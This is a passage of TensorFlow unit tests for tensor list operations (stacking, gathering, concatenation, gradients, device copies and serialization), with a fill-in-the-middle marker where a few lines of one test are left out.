list_ops.empty_tensor_list( element_dtype=dtypes.float32, element_shape=[1, 2], max_num_elements=max_num_elements) t = list_ops.tensor_list_stack(l, element_dtype=dtypes.float32) self.assertAllEqual(self.evaluate(t).shape, (0, 1, 2)) # Should not be able to stack empty lists with partially defined # element_shape. with self.assertRaisesRegexp(errors.InvalidArgumentError, "non-fully-defined"): l = list_ops.empty_tensor_list( element_dtype=dtypes.float32, element_shape=[None, 2], max_num_elements=max_num_elements) t = list_ops.tensor_list_stack(l, element_dtype=dtypes.float32) self.evaluate(t) # Should not be able to stack empty lists with undefined element_shape. with self.assertRaisesRegexp(errors.InvalidArgumentError, "non-fully-defined"): l = list_ops.empty_tensor_list( element_dtype=dtypes.float32, element_shape=None, max_num_elements=max_num_elements) t = list_ops.tensor_list_stack(l, element_dtype=dtypes.float32) self.evaluate(t) @parameterized.named_parameters(("NoMaxNumElements", None), ("WithMaxNumElements", 2)) def testGatherGrad(self, max_num_elements): with backprop.GradientTape() as tape: l = list_ops.empty_tensor_list( element_dtype=dtypes.float32, element_shape=[], max_num_elements=max_num_elements) c0 = constant_op.constant(1.0) tape.watch(c0) l = list_ops.tensor_list_push_back(l, c0) l = list_ops.tensor_list_push_back(l, constant_op.constant(2.0)) t = list_ops.tensor_list_gather(l, [1, 0], element_dtype=dtypes.float32) self.assertAllEqual(self.evaluate(t), [2.0, 1.0]) s = (t[0] + t[1]) * (t[0] + t[1]) dt = tape.gradient(s, c0) self.assertAllEqual(self.evaluate(dt), 6.0) @parameterized.named_parameters(("NoMaxNumElements", None), ("WithMaxNumElements", 3)) @test_util.run_deprecated_v1 def testGatherWithUnknownElementShape(self, max_num_elements): l = list_ops.empty_tensor_list( element_dtype=dtypes.float32, element_shape=None, max_num_elements=max_num_elements) l = list_ops.tensor_list_push_back(l, constant_op.constant(1.0)) l = list_ops.tensor_list_push_back(l, constant_op.constant(2.0)) l = list_ops.tensor_list_push_back(l, constant_op.constant([3.0, 4.0])) t = list_ops.tensor_list_gather(l, [1, 0], element_dtype=dtypes.float32) self.assertAllEqual(self.evaluate(t), [2.0, 1.0]) t = list_ops.tensor_list_gather(l, [2], element_dtype=dtypes.float32) self.assertAllEqual(self.evaluate(t), [[3.0, 4.0]]) # Should raise an error when the requested tensors do not all have the same # shape. with self.assertRaisesRegexp(errors.InvalidArgumentError, "unequal shapes"): t = list_ops.tensor_list_gather(l, [0, 2], element_dtype=dtypes.float32) self.evaluate(t) @parameterized.named_parameters(("NoMaxNumElements", None), ("WithMaxNumElements", 3)) @test_util.run_deprecated_v1 def testGatherWithPartiallyDefinedElementShape(self, max_num_elements): l = list_ops.empty_tensor_list( element_dtype=dtypes.float32, element_shape=[None], max_num_elements=max_num_elements) l = list_ops.tensor_list_push_back(l, constant_op.constant([1.0])) l = list_ops.tensor_list_push_back(l, constant_op.constant([2.0, 3.0])) l = list_ops.tensor_list_push_back(l, constant_op.constant([4.0, 5.0])) t = list_ops.tensor_list_gather(l, [0], element_dtype=dtypes.float32) self.assertAllEqual(self.evaluate(t), [[1.0]]) t = list_ops.tensor_list_gather(l, [1, 2], element_dtype=dtypes.float32) self.assertAllEqual(self.evaluate(t), [[2.0, 3.0], [4.0, 5.0]]) # Should raise an error when the requested tensors do not all have the same # shape. with self.assertRaisesRegexp(errors.InvalidArgumentError, "unequal shapes"): t = list_ops.tensor_list_gather(l, [0, 2], element_dtype=dtypes.float32) self.evaluate(t) @parameterized.named_parameters(("NoMaxNumElements", None), ("WithMaxNumElements", 3)) @test_util.run_deprecated_v1 def testGatherEmptyList(self, max_num_elements): # Should be able to gather from empty lists with fully defined # element_shape. l = list_ops.empty_tensor_list( element_dtype=dtypes.float32, element_shape=[1, 2], max_num_elements=max_num_elements) t = list_ops.tensor_list_gather(l, [], element_dtype=dtypes.float32) self.assertAllEqual((0, 1, 2), self.evaluate(t).shape) # Should not be able to gather from empty lists with partially defined # element_shape. with self.assertRaisesRegexp(errors.InvalidArgumentError, "non-fully-defined"): l = list_ops.empty_tensor_list( element_dtype=dtypes.float32, element_shape=[None, 2], max_num_elements=max_num_elements) t = list_ops.tensor_list_gather(l, [], element_dtype=dtypes.float32) self.evaluate(t) # Should not be able to gather from empty lists with undefined # element_shape. with self.assertRaisesRegexp(errors.InvalidArgumentError, "non-fully-defined"): l = list_ops.empty_tensor_list( element_dtype=dtypes.float32, element_shape=None, max_num_elements=max_num_elements) t = list_ops.tensor_list_gather(l, [], element_dtype=dtypes.float32) self.evaluate(t) def testScatterGrad(self): with backprop.GradientTape() as tape: c0 = constant_op.constant([1.0, 2.0]) tape.watch(c0) l = list_ops.tensor_list_scatter( c0, [1, 0], ops.convert_to_tensor([], dtype=dtypes.int32)) t0 = list_ops.tensor_list_get_item(l, 0, element_dtype=dtypes.float32) t1 = list_ops.tensor_list_get_item(l, 1, element_dtype=dtypes.float32) self.assertAllEqual(self.evaluate(t0), 2.0) self.assertAllEqual(self.evaluate(t1), 1.0) loss = t0 * t0 + t1 * t1 dt = tape.gradient(loss, c0) self.assertAllEqual(self.evaluate(dt), [2., 4.]) def testTensorListFromTensor(self): t = constant_op.constant([1.0, 2.0]) l = list_ops.tensor_list_from_tensor(t, element_shape=[]) l, e = list_ops.tensor_list_pop_back(l, element_dtype=dtypes.float32) self.assertAllEqual(self.evaluate(e), 2.0) l, e = list_ops.tensor_list_pop_back(l, element_dtype=dtypes.float32) self.assertAllEqual(self.evaluate(e), 1.0) self.assertAllEqual(self.evaluate(list_ops.tensor_list_length(l)), 0) def testFromTensorGPU(self): if not context.num_gpus(): return with context.device("gpu:0"): self.testTensorListFromTensor() def testGetSetItem(self): t = constant_op.constant([1.0, 2.0]) l = list_ops.tensor_list_from_tensor(t, element_shape=[]) e0 = list_ops.tensor_list_get_item(l, 0, element_dtype=dtypes.float32) self.assertAllEqual(self.evaluate(e0), 1.0) l = list_ops.tensor_list_set_item(l, 0, 3.0) t = list_ops.tensor_list_stack(l, element_dtype=dtypes.float32) self.assertAllEqual(self.evaluate(t), [3.0, 2.0]) def testGetSetGPU(self): if not context.num_gpus(): return with context.device("gpu:0"): self.testGetSetItem() def testSetGetGrad(self): with backprop.GradientTape() as tape: t = constant_op.constant(5.) tape.watch(t) l = list_ops.tensor_list_reserve( element_dtype=dtypes.float32, element_shape=[], num_elements=3) l = list_ops.tensor_list_set_item(l, 1, 2. * t) e = list_ops.tensor_list_get_item(l, 1, element_dtype=dtypes.float32) self.assertAllEqual(self.evaluate(e), 10.0) self.assertAllEqual(self.evaluate(tape.gradient(e, t)), 2.0) @test_util.run_deprecated_v1 @test_util.enable_control_flow_v2 def testSkipEagerSetItemIndexOutOfBounds(self): l = list_ops.empty_tensor_list( element_dtype=dtypes.float32, element_shape=[]) e0 = constant_op.constant(5.) l = list_ops.tensor_list_set_item( l, 0, 2. * e0, resize_if_index_out_of_bounds=True) l = list_ops.tensor_list_set_item( l, 1, 1., resize_if_index_out_of_bounds=True) t = list_ops.tensor_list_stack(l, element_dtype=dtypes.float32) grad = gradients_impl.gradients(t, e0)[0] self.assertAllEqual(self.evaluate(grad), 2.) @test_util.run_deprecated_v1 def testSetOnEmptyListWithMaxNumElementsFails(self): l = list_ops.empty_tensor_list( element_dtype=dtypes.float32, element_shape=[], max_num_elements=3) with self.assertRaisesRegexp( errors.InvalidArgumentError, "Trying to modify element 0 in a list with 0 elements."): l = list_ops.tensor_list_set_item(l, 0, 1.) self.evaluate(l) def testUnknownShape(self): l = list_ops.empty_tensor_list( element_dtype=dtypes.float32, element_shape=None) l = list_ops.tensor_list_push_back(l, constant_op.constant(1.0)) l = list_ops.tensor_list_push_back(l, constant_op.constant([1.0, 2.0])) l, e = list_ops.tensor_list_pop_back(l, element_dtype=dtypes.float32) self.assertAllEqual(self.evaluate(e), [1.0, 2.0]) l, e = list_ops.tensor_list_pop_back(l, element_dtype=dtypes.float32) self.assertAllEqual(self.evaluate(e), 1.0) def testCPUGPUCopy(self): if not context.num_gpus(): return t = constant_op.constant([1.0, 2.0]) l = list_ops.tensor_list_from_tensor(t, element_shape=[]) with context.device("gpu:0"): l_gpu = array_ops.identity(l) self.assertAllEqual( self.evaluate( list_ops.tensor_list_pop_back( l_gpu, element_dtype=dtypes.float32)[1]), 2.0) l_cpu = array_ops.identity(l_gpu) self.assertAllEqual( self.evaluate( list_ops.tensor_list_pop_back( l_cpu, element_dtype=dtypes.float32)[1]), 2.0) def testCPUGPUCopyNested(self): if not context.num_gpus(): return t = constant_op.constant([1.0, 2.0]) child_l = list_ops.tensor_list_from_tensor(t, element_shape=[]) l = list_ops.empty_tensor_list( element_shape=constant_op.constant([], dtype=dtypes.int32), element_dtype=dtypes.variant) l = list_ops.tensor_list_push_back(l, child_l) with context.device("gpu:0"): l_gpu = array_ops.identity(l) _, child_l_gpu = list_ops.tensor_list_pop_back( l_gpu, element_dtype=dtypes.variant) self.assertAllEqual( self.evaluate( list_ops.tensor_list_pop_back( child_l_gpu, element_dtype=dtypes.float32)[1]), 2.0) l_cpu = array_ops.identity(l_gpu) _, child_l_cpu = list_ops.tensor_list_pop_back( l_cpu, element_dtype=dtypes.variant) self.assertAllEqual( self.evaluate( list_ops.tensor_list_pop_back( child_l_cpu, element_dtype=dtypes.float32)[1]), 2.0) def testGraphStack(self): with self.cached_session(): tl = list_ops.empty_tensor_list( element_shape=constant_op.constant([1], dtype=dtypes.int32), element_dtype=dtypes.int32) tl = list_ops.tensor_list_push_back(tl, [1]) self.assertAllEqual( self.evaluate( list_ops.tensor_list_stack(tl, element_dtype=dtypes.int32)), [[1]]) def testSkipEagerStackInLoop(self): with self.cached_session(): t1 = list_ops.empty_tensor_list( element_shape=constant_op.constant([], dtype=dtypes.int32), element_dtype=dtypes.int32) i = constant_op.constant(0, dtype=dtypes.int32) def body(i, t1): t1 = list_ops.tensor_list_push_back(t1, i) i += 1 return i, t1 i, t1 = control_flow_ops.while_loop(lambda i, t1: math_ops.less(i, 4), body, [i, t1]) s1 = list_ops.tensor_list_stack(t1, element_dtype=dtypes.int32) self.assertAllEqual(self.evaluate(s1), [0, 1, 2, 3]) def testSkipEagerStackSwitchDtype(self): with self.cached_session(): list_ = list_ops.empty_tensor_list( element_shape=constant_op.constant([], dtype=dtypes.int32), element_dtype=dtypes.int32) m = constant_op.constant([1, 2, 3], dtype=dtypes.float32) def body(list_, m): list_ = control_flow_ops.cond( math_ops.equal(list_ops.tensor_list_length(list_), 0), lambda: list_ops.empty_tensor_list(m.shape, m.dtype), lambda: list_) list_ = list_ops.tensor_list_push_back(list_, m) return list_, m for _ in range(2): list_, m = body(list_, m) s1 = list_ops.tensor_list_stack(list_, element_dtype=dtypes.float32) np_s1 = np.array([[1, 2, 3], [1, 2, 3]], dtype=np.float32) self.assertAllEqual(self.evaluate(s1), np_s1) def testSkipEagerStackInLoopSwitchDtype(self): with self.cached_session(): t1 = list_ops.empty_tensor_list( element_shape=constant_op.constant([], dtype=dtypes.int32), element_dtype=dtypes.int32) i = constant_op.constant(0, dtype=dtypes.float32) m = constant_op.constant([1, 2, 3], dtype=dtypes.float32) def body(i, m, t1): t1 = control_flow_ops.cond( math_ops.equal(list_ops.tensor_list_length(t1), 0), lambda: list_ops.empty_tensor_list(m.shape, m.dtype), lambda: t1) t1 = list_ops.tensor_list_push_back(t1, m * i) i += 1.0 return i, m, t1 i, m, t1 = control_flow_ops.while_loop( lambda i, m, t1: math_ops.less(i, 4), body, [i, m, t1]) s1 = list_ops.tensor_list_stack(t1, element_dtype=dtypes.float32) np_s1 = np.vstack([np.arange(1, 4) * i for i in range(4)]) self.assertAllEqual(self.evaluate(s1), np_s1) def testSerialize(self): worker = test_util.create_local_cluster(num_workers=1, num_ps=1)[0][0] with ops.Graph().as_default(), session.Session(target=worker.target): with ops.device("/job:worker"): t = constant_op.constant([[1.0], [2.0]]) l = list_ops.tensor_list_from_tensor(t, element_shape=[1]) with ops.device("/job:ps"): l_ps = array_ops.identity(l) l_ps, e = list_ops.tensor_list_pop_back( l_ps, element_dtype=dtypes.float32) with ops.device("/job:worker"): worker_e = array_ops.identity(e) self.assertAllEqual(self.evaluate(worker_e), [2.0]) def testSerializeListWithInvalidTensors(self): worker = test_util.create_local_cluster(num_workers=1, num_ps=1)[0][0] with ops.Graph().as_default(), session.Session(target=worker.target): with ops.device("/job:worker"): l = list_ops.tensor_list_reserve( element_dtype=dtypes.float32, element_shape=[], num_elements=2) l = list_ops.tensor_list_set_item(l, 0, 1.) with ops.device("/job:ps"): l_ps = array_ops.identity(l) l_ps = list_ops.tensor_list_set_item(l_ps, 1, 2.) t = list_ops.tensor_list_stack(l_ps, element_dtype=dtypes.float32) with ops.device("/job:worker"): worker_t = array_ops.identity(t) self.assertAllEqual(self.evaluate(worker_t), [1.0, 2.0]) def testSerializeListWithUnknownRank(self): worker = test_util.create_local_cluster(num_workers=1, num_ps=1)[0][0] with ops.Graph().as_default(), session.Session(target=worker.target): with ops.device("/job:worker"): t = constant_op.constant([[1.0], [2.0]]) l = list_ops.tensor_list_from_tensor(t, element_shape=None) with ops.device("/job:ps"): l_ps = array_ops.identity(l) element_shape = list_ops.tensor_list_element_shape( l_ps, shape_type=dtypes.int32) with ops.device("/job:worker"): element_shape = array_ops.identity(element_shape) self.assertEqual(self.evaluate(element_shape), -1) def testSerializeListWithMaxNumElements(self): if context.num_gpus(): # TODO(b/119151861): Enable on GPU. return worker = test_util.create_local_cluster(num_workers=1, num_ps=1)[0][0] with ops.Graph().as_default(), session.Session(target=worker.target): with ops.device("/job:worker"): l = list_ops.empty_tensor_list( element_shape=None, element_dtype=dtypes.float32, max_num_elements=2) l = list_ops.tensor_list_push_back(l, 1.) with ops.device("/job:ps"): l_ps = array_ops.identity(l) l_ps = list_ops.tensor_list_push_back(l_ps, 2.) with self.assertRaisesRegexp(errors.InvalidArgumentError, "Tried to push item into a full list"): with ops.device("/job:worker"): l_worker = array_ops.identity(l_ps) l_worker = list_ops.tensor_list_push_back(l_worker, 3.0) self.evaluate(l_worker) def testPushPopGradients(self): with backprop.GradientTape() as tape: l = list_ops.empty_tensor_list( element_dtype=dtypes.float32, element_shape=[]) c = constant_op.constant(1.0) tape.watch(c) l = list_ops.tensor_list_push_back(l, c) l, e = list_ops.tensor_list_pop_back(l, element_dtype=dtypes.float32) e = 2 * e self.assertAllEqual(self.evaluate(tape.gradient(e, [c])[0]), 2.0) def testStackFromTensorGradients(self): with backprop.GradientTape() as tape: c = constant_op.constant([1.0, 2.0]) tape.watch(c) l = list_ops.tensor_list_from_tensor(c, element_shape=[]) c2 = list_ops.tensor_list_stack( l, element_dtype=dtypes.float32, num_elements=2) result = c2 * 2.0 grad = tape.gradient(result, [c])[0] self.assertAllEqual(self.evaluate(grad), [2.0, 2.0]) def testGetSetGradients(self): with backprop.GradientTape() as tape: c = constant_op.constant([1.0, 2.0]) tape.watch(c) l = list_ops.tensor_list_from_tensor(c, element_shape=[]) c2 = constant_op.constant(3.0) tape.watch(c2) l = list_ops.tensor_list_set_item(l, 0, c2) e = list_ops.tensor_list_get_item(l, 0, element_dtype=dtypes.float32) ee = list_ops.tensor_list_get_item(l, 1, element_dtype=dtypes.float32) y = e * e + ee * ee grad_c, grad_c2 = tape.gradient(y, [c, c2]) self.assertAllEqual(self.evaluate(grad_c), [0.0, 4.0]) self.assertAllEqual(self.evaluate(grad_c2), 6.0) @test_util.run_deprecated_v1 def testSetOutOfBounds(self): c = constant_op.constant([1.0, 2.0]) l = list_ops.tensor_list_from_tensor(c, element_shape=[]) with self.assertRaises(errors.InvalidArgumentError): self.evaluate(list_ops.tensor_list_set_item(l, 20, 3.0)) @test_util.run_deprecated_v1 def testSkipEagerSetItemWithMismatchedShapeFails(self): with self.cached_session() as sess: ph = array_ops.placeholder(dtypes.float32) c = constant_op.constant([1.0, 2.0]) l = list_ops.tensor_list_from_tensor(c, element_shape=[]) # Set a placeholder with unknown shape to satisfy the shape inference # at graph building time. l = list_ops.tensor_list_set_item(l, 0, ph) l_0 = list_ops.tensor_list_get_item(l, 0, element_dtype=dtypes.float32) with self.assertRaisesRegexp(errors.InvalidArgumentError, "incompatible shape"): sess.run(l_0, {ph: [3.0]}) def testResourceVariableScatterGather(self): c = constant_op.constant([1.0, 2.0], dtype=dtypes.float32) l = list_ops.tensor_list_from_tensor(c, element_shape=[]) v = vs.get_variable("var", initializer=[l] * 10, use_resource=True) v_r_0_stacked = list_ops.tensor_list_stack(v[0], dtypes.float32) self.evaluate(v.initializer) self.assertAllEqual([1.0, 2.0], self.evaluate(v_r_0_stacked)) v_r_sparse_stacked = list_ops.tensor_list_stack( v.sparse_read(0), dtypes.float32) self.assertAllEqual([1.0, 2.0], self.evaluate(v_r_sparse_stacked)) l_new_0 = list_ops.tensor_list_from_tensor([3.0, 4.0], element_shape=[]) l_new_1 = list_ops.tensor_list_from_tensor([5.0, 6.0], element_shape=[]) updated_v = state_ops.scatter_update(v, [3, 5], [l_new_0, l_new_1]) updated_v_elems = array_ops.unstack(updated_v) updated_v_stacked = [ list_ops.tensor_list_stack(el, dtypes.float32) for el in updated_v_elems ] expected = ([[1.0, 2.0]] * 3 + [[3.0, 4.0], [1.0, 2.0], [5.0, 6.0]] + [[1.0, 2.0]] * 4) self.assertAllEqual(self.evaluate(updated_v_stacked), expected) @test_util.run_deprecated_v1 def testConcat(self): c = constant_op.constant([1.0, 2.0], dtype=dtypes.float32) l0 = list_ops.tensor_list_from_tensor(c, element_shape=[]) l1 = list_ops.tensor_list_from_tensor([-1.0], element_shape=[]) l_batch_0 = array_ops.stack([l0, l1]) l_batch_1 = array_ops.stack([l1, l0]) l_concat_01 = list_ops.tensor_list_concat_lists( l_batch_0, l_batch_1, element_dtype=dtypes.float32) l_concat_10 = list_ops.tensor_list_concat_lists( l_batch_1, l_batch_0, element_dtype=dtypes.float32) l_concat_00 = list_ops.tensor_list_concat_lists( l_batch_0, l_batch_0, element_dtype=dtypes.float32) l_concat_11 = list_ops.tensor_list_concat_lists( l_batch_1, l_batch_1, element_dtype=dtypes.float32) expected_00 = [[1.0, 2.0, 1.0, 2.0], [-1.0, -1.0]] expected_01 = [[1.0, 2.0, -1.0], [-1.0, 1.0, 2.0]] expected_10 = [[-1.0, 1.0, 2.0], [1.0, 2.0, -1.0]] expected_11 = [[-1.0, -1.0], [1.0, 2.0, 1.0, 2.0]] for i, (concat, expected) in enumerate(zip( [l_concat_00, l_concat_01, l_concat_10, l_concat_11], [expected_00, expected_01, expected_10, expected_11])): splitted = array_ops.unstack(concat) splitted_stacked_ret = self.evaluate( (list_ops.tensor_list_stack(splitted[0], dtypes.float32), list_ops.tensor_list_stack(splitted[1], dtypes.float32))) print("Test concat %d: %s, %s, %s, %s" % (i, expected[0], splitted_stacked_ret[0], expected[1], splitted_stacked_ret[1])) self.assertAllClose(expected[0], splitted_stacked_ret[0]) self.assertAllClose(expected[1], splitted_stacked_ret[1]) # Concatenating mismatched shapes fails. with self.assertRaises((errors.InvalidArgumentError, ValueError)): self.evaluate( list_ops.tensor_list_concat_lists( l_batch_0, list_ops.empty_tensor_list([], dtypes.float32), element_dtype=dtypes.float32)) with self.assertRaisesRegexp(errors.InvalidArgumentError, "element shapes are not identical at index 0"): l_batch_of_vec_tls = array_ops.stack( [list_ops.tensor_list_from_tensor([[1.0]], element_shape=[1])] * 2) self.evaluate( list_ops.tensor_list_concat_lists(l_batch_0, l_batch_of_vec_tls, element_dtype=dtypes.float32)) with self.assertRaisesRegexp(errors.InvalidArgumentError, r"input_b\[0\].dtype != element_dtype."): l_batch_of_int_tls = array_ops.stack( [list_ops.tensor_list_from_tensor([1], element_shape=[])] * 2) self.evaluate( list_ops.tensor_list_concat_lists(l_batch_0, l_batch_of_int_tls, element_dtype=dtypes.float32)) @test_util.run_deprecated_v1 def testPushBackBatch(self): c = constant_op.constant([1.0, 2.0], dtype=dtypes.float32) l0 = list_ops.tensor_list_from_tensor(c, element_shape=[]) l1 = list_ops.tensor_list_from_tensor([-1.0], element_shape=[]) l_batch = array_ops.stack([l0, l1]) l_push = list_ops.tensor_list_push_back_batch(l_batch, [3.0, 4.0]) l_unstack = array_ops.unstack(l_push) l0_ret = list_ops.tensor_list_stack(l_unstack[0], dtypes.float32) l1_ret = list_ops.tensor_list_stack(l_unstack[1], dtypes.float32) self.assertAllClose([1.0, 2.0, 3.0], self.evaluate(l0_ret)) self.assertAllClose([-1.0, 4.0], self.evaluate(l1_ret)) with ops.control_dependencies([l_push]): l_unstack_orig = array_ops.unstack(l_batch) l0_orig_ret = list_ops.tensor_list_stack(l_unstack_orig[0], dtypes.float32) l1_orig_ret = list_ops.tensor_list_stack(l_unstack_orig[1], dtypes.float32) # Check that without aliasing, push_back_batch still works; and # that it doesn't modify the input. l0_r_v, l1_r_v, l0_orig_v, l1_orig_v = self.evaluate( (l0_ret, l1_ret, l0_orig_ret, l1_orig_ret)) self.assertAllClose([1.0, 2.0, 3.0], l0_r_v) self.assertAllClose([-1.0, 4.0], l1_r_v) self.assertAllClose([1.0, 2.0], l0_orig_v) self.assertAllClose([-1.0], l1_orig_v) # Pushing back mismatched shapes fails. with self.assertRaises((errors.InvalidArgumentError, ValueError)): self.evaluate(list_ops.tensor_list_push_back_batch(l_batch, [])) with self.assertRaisesRegexp(errors.InvalidArgumentError, "incompatible shape to a list at index 0"): self.evaluate( list_ops.tensor_list_push_back_batch(l_batch, [[3.0], [4.0]])) with self.assertRaisesRegexp(errors.InvalidArgumentError, "Invalid data type at index 0"): self.evaluate(list_ops.tensor_list_push_back_batch(l_batch, [3, 4])) def testZerosLike(self): for dtype in (dtypes.uint8, dtypes.uint16, dtypes.int8, dtypes.int16, dtypes.int32, dtypes.int64, dtypes.float16, dtypes.float32, dtypes.float64, dtypes.complex64, dtypes.complex128, dtypes.bool): l_empty = list_ops.empty_tensor_list( element_dtype=dtype, element_shape=[]) l_empty_zeros = array_ops.zeros_like(l_empty) t_empty_zeros = list_ops.tensor_list_stack( l_empty_zeros, element_dtype=dtype) l_full = list_ops.tensor_list_push_back(l_empty, math_ops.cast(0, dtype=dtype)) l_full = list_ops.tensor_list_push_back(l_full, math_ops.cast(1, dtype=dtype)) l_full_zeros = array_ops.zeros_like(l_full) t_full_zeros = list_ops.tensor_list_stack( l_full_zeros, element_dtype=dtype) self.assertAllEqual(self.evaluate(t_empty_zeros), []) self.assertAllEqual( self.evaluate(t_full_zeros), np.zeros( (2,), dtype=dtype.as_numpy_dtype)) def testZerosLikeNested(self): for dtype in (dtypes.uint8, dtypes.uint16, dtypes.int8, dtypes.int16, dtypes.int32, dtypes.int64, dtypes.float16, dtypes.float32, dtypes.float64, dtypes.complex64, dtypes.complex128, dtypes.bool): l = list_ops.empty_tensor_list( element_dtype=dtypes.variant, element_shape=[]) sub_l = list_ops.empty_tensor_list(element_dtype=dtype, element_shape=[]) l = list_ops.tensor_list_push_back(l, sub_l) sub_l = list_ops.tensor_list_push_back(sub_l, math_ops.cast( 1, dtype=dtype)) l = list_ops.tensor_list_push_back(l, sub_l) sub_l = list_ops.tensor_list_push_back(sub_l, math_ops.cast( 2, dtype=dtype)) l = list_ops.tensor_list_push_back(l, sub_l) # l : [[], # [1], # [1, 2]] # # l_zeros : [[], # [0], # [0, 0]] l_zeros = array_ops.zeros_like(l) outputs = [] for _ in range(3): l_zeros, out = list_ops.tensor_list_pop_back( l_zeros, element_dtype=dtypes.variant) outputs.append(list_ops.tensor_list_stack(out, element_dtype=dtype)) # Note: `outputs` contains popped values so the order is reversed. self.assertAllEqual(self.evaluate(outputs[2]), []) self.assertAllEqual( self.evaluate(outputs[1]), np.zeros((1,), dtype=dtype.as_numpy_dtype)) self.assertAllEqual( self.evaluate(outputs[0]), np.zeros((2,), dtype=dtype.as_numpy_dtype)) def testElementShape(self): l = list_ops.empty_tensor_list( element_dtype=dtypes.float32, element_shape=None) shape = list_ops.tensor_list_element_shape(l, shape_type=dtypes.int32) self.assertEqual(self.evaluate(shape), -1) def testZerosLikeUninitialized(self): l0 = list_ops.tensor_list_reserve([], 3, element_dtype=dtypes.float32) l1 = list_ops.tensor_list_set_item(l0, 0, 1.) # [1., _, _] zeros_1 = array_ops.zeros_like(l1) # [0., _, _] l2 = list_ops.tensor_list_set_item(l1, 2, 2.) # [1., _, 2.] zeros_2 = array_ops.zeros_like(l2) # [0., _, 0.] # Gather indices with zeros in `zeros_1`. res_1 = list_ops.tensor_list_gather( zeros_1, [0], element_dtype=dtypes.float32) # Gather indices with zeros in `zeros_2`. res_2 = list_ops.tensor_list_gather( zeros_2, [0, 2], element_dtype=dtypes.float32) self.assertAllEqual(self.evaluate(res_1), [0.]) self.assertAllEqual(self.evaluate(res_2), [0., 0.]) @test_util.run_deprecated_v1 def testSkipEagerTensorListGetItemGradAggregation(self): l = list_ops.tensor_list_reserve( element_shape=[], num_elements=1, element_dtype=dtypes.float32) x = constant_op.constant(1.0) l = list_ops.tensor_list_set_item(l, 0, x) l_read1 = list_ops.tensor_list_get_item(l, 0, element_dtype=dtypes.float32) l_read2 = list_ops.tensor_list_get_item(l, 0, element_dtype=dtypes.float32) grad = gradients_impl.gradients([l_read1, l_read2], [x]) with self.cached_session() as sess: self.assertSequenceEqual(self.evaluate(grad), [2.]) @test_util.run_deprecated_v1 def testSkipEagerBuildElementShape(self): fn = list_ops._build_element_shape # Unknown shape -> -1. self.assertEqual(fn(None), -1) self.assertEqual(fn(tensor_shape.unknown_shape()), -1) # Scalar shape -> [] with type int32. self.assertEqual(fn([]).dtype, dtypes.int32) self.assertEqual(fn(tensor_shape.scalar()).dtype, dtypes.int32) self.assertAllEqual(self.evaluate(fn([])), np.array([], np.int32)) self.assertAllEqual( self.evaluate(fn(tensor_shape.scalar())), np.array([], np.int32)) # Tensor -> Tensor shape = constant_op.constant(1) self.assertIs(fn(shape), shape) # Shape with unknown dims -> shape list with -1's. shape = [None, 5] self.assertAllEqual(fn(shape), [-1, 5]) self.assertAllEqual(fn(tensor_shape.TensorShape(shape)), [-1, 5]) # Shape with unknown dims and tensor dims -> shape list with -1's and tensor # dims. t = array_ops.placeholder(dtypes.int32) shape = [None, 5, t] result = fn(shape) self.assertAllEqual(result[:2], [-1, 5]) self.assertIs(result[2], t) def testAddN(self): l1 = list_ops.tensor_list_from_tensor([1.0, 2.0], element_shape=[]) l2 = list_ops.tensor_list_from_tensor([3.0, 4.0], element_shape=[]) l3 = list_ops.tensor_list_from_tensor([5.0, 6.0], element_shape=[]) result = math_ops.add_n((l1, l2, l3)) result_t = list_ops.tensor_list_stack(result, element_dtype=dtypes.float32) self.assertAllEqual(self.evaluate(result_t), [9., 12.]) def testAddNNestedList(self): l1 = list_ops.tensor_list_from_tensor([1.0, 2.0], element_shape=[]) l2 = list_ops.tensor_list_from_tensor([3.0, 4.0], element_shape=[]) l3 = list_ops.tensor_list_from_tensor([5.0, 6.0], element_shape=[]) l4 = list_ops.tensor_list_from_tensor([7.0, 8.0], element_shape=[]) a = list_ops.empty_tensor_list( element_dtype=dtypes.variant, element_shape=[])<|fim▁hole|> b = list_ops.tensor_list_push_back(b, l3) b = list_ops.tensor_list_push_back(b, l4) result = math_ops.add_n((a, b)) result_0 = list_ops.tensor_list_stack( list_ops.tensor_list_get_item(result, 0, element_dtype=dtypes.variant), element_dtype=dtypes.float32) result_1 = list_ops.tensor_list_stack( list_ops.tensor_list_get_item(result, 1, element_dtype=dtypes.variant), element_dtype=dtypes.float32) self.assertAllEqual(self.evaluate(result_0), [6., 8.]) self.assertAllEqual(self.evaluate(result_1), [10., 12.]) @test_util.run_deprecated_v1 def testSkipEagerConcatShapeInference(self): def BuildTensor(element_shape): l = list_ops.empty_tensor_list( element_dtype=dtypes.float32, element_shape=element_shape) return list_ops.tensor_list_concat(l, element_dtype=dtypes.float32) self.assertIsNone(BuildTensor(None).shape.rank) self.assertAllEqual(BuildTensor([None, 2, 3]).shape.as_list(), [None, 2, 3]) self.assertAllEqual( BuildTensor([None, 2, None]).shape.as_list(), [None, 2, None]) self.assertAllEqual(BuildTensor([1, 2, 3]).shape.as_list(), [None, 2, 3]) def testConcatWithFullyDefinedElementShape(self): l = list_ops.empty_tensor_list( element_dtype=dtypes.float32, element_shape=[2, 2]) l = list_ops.tensor_list_push_back(l, [[0., 1.], [2., 3.]]) l = list_ops.tensor_list_push_back(l, [[4., 5.], [6., 7.]]) t = list_ops.tensor_list_concat(l, element_dtype=dtypes.float32) self.assertAllEqual( self.evaluate(t), [[0., 1.], [2., 3.], [4., 5.], [6., 7.]]) def testConcatWithNonFullyDefinedElementShape(self): l = list_ops.empty_tensor_list( element_dtype=dtypes.float32, element_shape=[None, 2]) l = list_ops.tensor_list_push_back(l, [[0., 1.]]) l = list_ops.tensor_list_push_back(l, [[2., 3.], [4., 5.]]) t = list_ops.tensor_list_concat(l, element_dtype=dtypes.float32) self.assertAllEqual(self.evaluate(t), [[0., 1.], [2., 3.], [4., 5.]]) def testConcatWithMismatchingTensorShapesFails(self): l = list_ops.empty_tensor_list( element_dtype=dtypes.float32, element_shape=None) l = list_ops.tensor_list_push_back(l, [[0., 1.]]) l = list_ops.tensor_list_push_back(l, [[2.], [4.]]) with self.assertRaisesRegexp( errors.InvalidArgumentError, r"Tried to concat tensors with unequal shapes: " r"\[2\] vs \[1\]"): t = list_ops.tensor_list_concat(l, element_dtype=dtypes.float32) self.evaluate(t) def testConcatEmptyListWithFullyDefinedElementShape(self): l = list_ops.empty_tensor_list( element_dtype=dtypes.float32, element_shape=[5, 2]) t = list_ops.tensor_list_concat(l, element_dtype=dtypes.float32) self.assertAllEqual(self.evaluate(t).shape, (0, 2)) l = list_ops.empty_tensor_list( element_dtype=dtypes.float32, element_shape=[None, 2]) t = list_ops.tensor_list_concat(l, element_dtype=dtypes.float32) 